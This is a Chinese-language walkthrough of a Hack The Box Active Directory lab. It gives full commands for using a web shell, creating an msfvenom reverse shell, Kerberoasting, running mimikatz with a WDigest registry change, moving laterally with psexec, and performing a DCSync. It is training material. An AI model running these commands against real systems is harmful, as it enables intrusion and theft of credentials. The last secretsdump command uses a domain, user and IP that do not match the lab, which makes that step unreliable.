HTB AD域渗透Skills Assessment Part I复现

1.前提

在开展外部渗透测试期间，我们的团队成员在对面向外部的Web服务器进行侦察时，成功发现并利用了一个文件上传点。由于项目优先级调整，该成员在转至紧急项目前，已在/uploads目录部署了受密码保护的Web shell（凭据：admin:My_W3bsH3ll_P@ssw0rd!），为后续评估工作奠定了基础。此次评估获得了客户Inlanefreight的明确授权，要求我们以该初始立足点为起点，深入探索内部网络，重点关注Active Directory环境中的高风险问题。我们的目标是通过Web shell在内部网络建立初始访问，进而对AD环境进行详细枚举，识别漏洞和配置缺陷，最终实现横向移动和域妥协。

2.枚举

2.1 TCP

nmap -T4 -sV -sC -p- -Pn -n 10.129.202.242 --open

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-05-14T12:37:28
|_  start_date: N/A
|_clock-skew: -3h50m46s

2.2 UDP

sudo nmap -Pn -n 10.129.202.242 -sU --top-ports=100 --reason

任务一

连接webshell

http://10.129.202.242/uploads/antak.aspx

admin:My_W3bsH3ll_P@ssw0rd!

webshell链接

ifconfig

查看网段，发现有172内网网段

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.12 LPORT=4444 -f exe > reverse.exe

拿到shell


拿到flag

任务二

使用setspn.exe 枚举 SPN

setspn.exe -Q */*

答案为svc_sql

任务三

破解spn密码，可以上传Rubeus.exe ，执行Kerberoasting

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
将hash写到本地文件中

拿着hash进行爆破

hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt 

答案lucky7

任务四

ping MS01,拿到目标ip

搭建内网隧道，使用ligolo-ng

在靶机目标上传agent.exe,启动并连接到kail端

隧道创建

发现有smb的管理员权限

横向移动psexec

impacket-psexec 'svc_sql':'lucky7'@172.16.6.50

答案是
spn$r0ast1ng_on@n_0p3n_f1re

任务五

需要搭建一个端口转发，172网段机器，无法直接路由到我们kali

可以就可以将mimikatz下载到ms01机器。
导出hash

sekurlsa::logonpasswords

发现用户名为tpetty

任务六

是拿到tp用户的密码，我们使用hashcat
这里我们无法爆破，可以使用
下面方法：
修改UseLogonCredential注册表，为1
可以得到明文密码。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

然后重启机器
mimikatz.exe
由于
我们也拥有rdp权限

xfreerdp3 /u:'svc_sql' /p:'lucky7' /v:172.16.6.50 /drive:Shared,//home/kali/

使用drive可以快速访问我们的工具

发现密码

答案为 Sup3rS3cur3D0m@inU2eR

任务七

这个用户可以执行什么攻击？
我们可以使用bloodhound 查看一下用户的ACL权限

答案是用户可以执行 DCsync

任务八

接管域，并在DC01上的管理员桌面上提交flag.txt文件的内容

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:“BrouhahaTungPerorateBroom2023!”@192.168.50.70

拿到DC01的ip。

拿到ad管理员的ntlm 哈希

然后使用evil-winrm

拿到flag